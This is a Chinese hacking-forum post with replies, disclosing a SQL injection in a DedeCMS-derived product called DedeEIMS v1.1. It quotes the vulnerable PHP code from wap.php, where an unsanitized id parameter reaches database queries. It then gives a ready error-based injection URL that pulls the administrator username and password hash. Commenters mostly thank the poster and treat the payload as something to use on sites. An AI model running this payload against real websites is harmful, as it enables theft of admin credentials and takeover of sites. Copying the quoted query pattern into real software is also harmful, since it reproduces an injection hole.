dedeeims v1.1 SQL Injection
前几天搞站第一次遇到,御剑的指纹识别出dedecms,但是没想到打开一看,原来是它亲戚。我操。
wap.php
......
else if($action=='list')
{
$nrow = $dsql->GetOne("Select * From `#@__arctype` where ID='$id' ");
if($nrow['ishidden']==1) exit();
$typename = ConvertStr($nrow['typename']);
$typeid = $nrow['id'];
$catcontect = '';
$userLang = $nrow['lang'];
if($nrow['ispart']==3)
{
$catcontect = html2wml($nrow['content']);
}
$trow = $dsql->GetOne("Select id,typename From `#@__arctype` where lang='$userLang' And reid=0 ");
$langname = ConvertStr($trow['typename']);
$langid = $trow['id'];
//当前栏目下级分类
$dsql->SetQuery("Select ID,typename From `#@__arctype` where reID='$id' And channeltype=1 And ishidden=0 And ispart<>2 order by sortrank");
$dsql->Execute();
while($row=$dsql->GetObject())
{
$channellistnext .= "<a href='wap.php?action=list&id={$row->ID}'>".ConvertStr($row->typename)."</a> ";
}
//栏目内容(分页输出)
$sids = GetSonIds($id,1,true);
$varlist = "cfg_webname,typename,channellist,channellistnext,cfg_templeturl";
ConvertCharset($varlist);
require_once(dirname(__FILE__)."/include/datalistcp.class.php");
$dlist = new DataListCP();
$dlist->SetTemplet($cfg_templets_dir."/wap/list.wml");
$dlist->pageSize = 10;
$dlist->SetParameter("action","list");
$dlist->SetParameter("id",$id);
$dlist->SetSource("Select ID,title,pubdate,click From `#@__archives` where typeid in($sids) And arcrank=0 order by ID desc"); //注入
$dlist->Display();
exit();
}
.......
//获得某id的所有下级id
function GetSonIds($id,$channel=0,$addthis=true)
{
global $_Cs;
$GLOBALS['idArray'] = array();
if( !is_array($_Cs) )
{
require_once(DEDEROOT."/data/cache/inc_catalog_base.inc");
}
GetSonIdsLogic($id,$_Cs,$channel,$addthis);
$rquery = join(',',$GLOBALS['idArray']);
return $rquery;
}
//递归逻辑
function GetSonIdsLogic($id,$sArr,$channel=0,$addthis=false)
{
if($id!=0 && $addthis)
{
$GLOBALS['idArray'][$id] = $id;
}
foreach($sArr as $k=>$v)
{
if( $v[0]==$id && ($channel==0 || $v[1]==$channel ))
{
GetSonIdsLogic($k,$sArr,$channel,true);
}
}
}
[url]http://10.1.1.129/DedeEIMS_1.1/wap.php?action=list&id=1[/url] or @`'`=1 and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a from information_schema.tables group by a)b) and @`'`=0
评论43次
看看,不错好东西
这下又有的搞了哦,谢谢LZ
呵呵,支持
dede后台永远是个最大的问题
果然是近亲
可以转载么
应该是 修改过的dede ,、
我开始看以为是DEDE,原来只是近亲
dede和phpcms看来都成漏洞双煞了。。
呵呵 正常 我也时常不知道 经常看一下时间 半夜两点了
霸气啊 。。
dede修改过来的吧
哈哈,居然是亲戚!!
没 遇到过这个cms,搜藏了~~~
又见DEDE 呵呵
hackbar
[at][url=https://www.t00ls.com/space-uid-5889.html]@neutrino[/at][/url] 想问问你这个浏览器的插件是?
看到亲戚我笑了。。
谢谢支持,期待另一个注入发出来交流学xi。
呵呵,你不说我还不知道快12点了。